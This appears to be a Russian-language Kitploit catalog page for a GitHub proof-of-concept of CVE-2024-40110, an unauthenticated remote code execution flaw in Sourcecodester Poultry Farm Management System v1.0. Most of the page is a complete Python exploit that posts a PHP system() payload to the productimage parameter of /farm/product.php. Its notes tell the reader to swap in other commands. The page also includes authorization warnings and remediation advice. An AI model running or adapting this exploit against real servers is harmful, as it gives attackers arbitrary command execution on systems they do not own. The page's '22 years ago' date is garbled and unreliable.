Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-40110 — Скрипт Proof-of-concept, демонстрирующий удаленное выполнение кода без аутентификации в Sourcecodester Poultry Farm Management System через уязвимый параметр productimage. | Kitploit
Инструменты/GitHubGitHub/abdurahmon3236/cve-2024-40110
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Скрипт Proof-of-concept, демонстрирующий удаленное выполнение кода без аутентификации в Sourcecodester Poultry Farm Management System через уязвимый параметр productimage.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Proof of Concept (PoC) для неавторизованного удаленного выполнения кода в Sourcecodester Poultry Farm Management System v1.0

Этот репозиторий содержит скрипт Proof of Concept (PoC), демонстрирующий уязвимость неавторизованного удаленного выполнения кода (RCE) в Sourcecodester Poultry Farm Management System v1.0. Уязвимость существует в параметре productimage по адресу /farm/product.php, что позволяет злоумышленнику выполнять произвольный код на сервере.

Содержание

  • Описание уязвимости
  • Установка и использование
    • Скрипт PoC
  • Важные соображения
  • Меры по устранению

Описание уязвимости

CVE-ID: (Ожидается)

Обзор: Sourcecodester Poultry Farm Management System v1.0 содержит уязвимость неавторизованного удаленного выполнения кода (RCE) через параметр productimage по адресу /farm/product.php. Эта уязвимость позволяет злоумышленнику выполнять произвольный код на сервере без аутентификации.

Затронутая версия:

  • Sourcecodester Poultry Farm Management System v1.0

Установка и использование

Предварительные требования

  • Python 3.x
  • Библиотека requests (pip install requests)

Скрипт PoC

Этот скрипт демонстрирует, как злоумышленник может использовать уязвимость RCE, отправляя вредоносный запрос на уязвимый параметр.

Сохраните следующий скрипт как rce_poc.py и запустите его.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

Пояснение

  1. Конфигурация: Установите target_url на URL уязвимого сервера /farm/product.php.
  2. Полезная нагрузка: Полезная нагрузка представляет собой простую команду PHP для выполнения команд. Вы можете изменить полезную нагрузку для выполнения различных команд по мере необходимости.
  3. Формирование запроса: Скрипт формирует POST-запрос с вредоносной полезной нагрузкой в параметре productimage.
  4. Функция эксплуатации: Функция exploit_rce() отправляет вредоносный запрос на целевой URL и выводит детали ответа.
  5. Запуск скрипта: При выполнении скрипт попытается использовать уязвимость RCE и выведет результаты.

Важные соображения

  • Разрешения: Убедитесь, что у вас есть явное разрешение на тестирование этой уязвимости на целевой системе. Несанкционированное тестирование является незаконным и неэтичным.
  • Тестовая среда: Проводите этот тест в контролируемой среде, чтобы избежать влияния на рабочие системы.
  • Настройка полезной нагрузки: Настройте полезную нагрузку по мере необходимости для выполнения нужной команды.

Меры по устранению

Для устранения этой уязвимости примените следующие шаги:

  • Проверка ввода: Реализуйте надлежащую проверку ввода для очистки пользовательских данных.
  • Ограничения загрузки файлов: Ограничьте загрузку файлов, разрешив только определенные типы файлов и установив ограничения на размер.
  • Обновление ПО: Регулярно обновляйте программное обеспечение до последней версии, чтобы применять исправления безопасности и обновления.

Следуя этим мерам по устранению и лучшим практикам безопасности, вы сможете предотвратить такие уязвимости, как эта проблема RCE в Sourcecodester Poultry Farm Management System v1.0.

Скачать инструмент